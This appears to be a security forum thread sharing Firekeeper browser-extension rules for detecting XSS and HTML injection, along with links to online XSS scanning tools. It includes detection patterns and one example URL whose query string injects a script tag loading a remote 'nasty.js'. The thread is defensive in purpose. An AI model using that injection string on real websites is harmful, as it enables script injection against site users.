Turn your firekeeper add-on in an XSS test tool..

Hi malware fighters,

You have the firekeeper extension installed inside Fx or flock browser, open and add the following rules;
alert (msg:”Possible HTML Injection detected!”; body_content:”“:wink:
alert (msg:”Possible XSS detected!”; body_content:”>alert(”:wink:
alert (msg:”Possible XSS detected!”; body_content:”>document.write(”:wink:
alert (msg:”Possible XSS detected!”; body_content:”>document.body.innerHTML =”:wink:
Start online testing here: http://www.zubrag.com/tools/sql-injection-test.php
Other online tools for XSS-vulnerability testing: http://www.zubrag.com/tools/
Begin automated testing here from this site:
http://alcazar.sisl.rites.uic.edu/~mike/cgi-bin/browser-neutral-xss/evaluation/effectiveness/xss-cheat-sheet/automate.php (these simulated test attacks here will not perform any malicious actions,
my good forum friends)
I get an alert box here now and for instance a link report like:
({status: ‘recorded’, goto: ‘http://alcazar.sisl.rites.uic.edu/~mike/cgi-bin/browser-neutral-xss/evaluation/effectiveness/xss-cheat-sheet/automate.php?action=getAttack&testId=1277136452211&no=69&scenario=a&auto=1’});

Happy hunt,

pol

P.S. for tags checking: http://www.zubrag.com/tools/html-tags-stripper.php
combined with possible exploit: http://www.securiteam.com/securitynews/5HP031PAKY.html
just use your imagination to pen-test…
Example:
Not found there but an obfuscation url exploit test: === Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=http://target/getdata.php?data=<script%20src="http%3A%2F%2F+www.searchlores..com%2Fnasty.js"><%2Fscript>

Source adopted from: http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html

D

Hi malware fighters,

Like to present you with a nece collection of website testing tools: http://www.softwareqatest.com/qatweb1.html#SECURITY

bookmarked the link,

pol

Hi malware fighters,

Fill in the captcha and see:
http://xss-scanner.com/index.php?url=http%3A%2F%2Fwww.telegraaf.nl%2Fdigitaal%2F7006060%2F__Mini_notebook_met_twee_schermen__.html%3Fsn%3D&method=get&recaptcha_challenge_field=02c1I5-x5ud3x4YKDzYYTjkzlRsNOKLlNKzkGpd5VTuQ8GXz-rE9Kjqc_2UcfECXCQvOm18IVuH-0KrOuu5b56jweTvCsitGSorJh55mYXpanPFy7HLYn6UNnSGcrl-VnSkuKqwbHbsH5Os5Mqi7PKispMmQi-vKJmulPI053-FiuKGXdHFcKvRFq9hMZBBD9o2_8mxDEn-LOc_NPzZQYoDOJckTmk5kORoiX99ejJgM2Y4cYCxuZM6DSS2VL6RYUa9W-cQ6T18NYwtxFzbbfHbMO-qjIB&recaptcha_response_field=played+week

polonus

Hi malware fighters,

Another little online testing tool found here:
http://www.seoegghead.com/tools/scan-for-html-injection.seo
Off course just for testing websites you are entitled/allowed to test
You could also test here: http://sucuri.net/?page=scan

enjoy,

polonus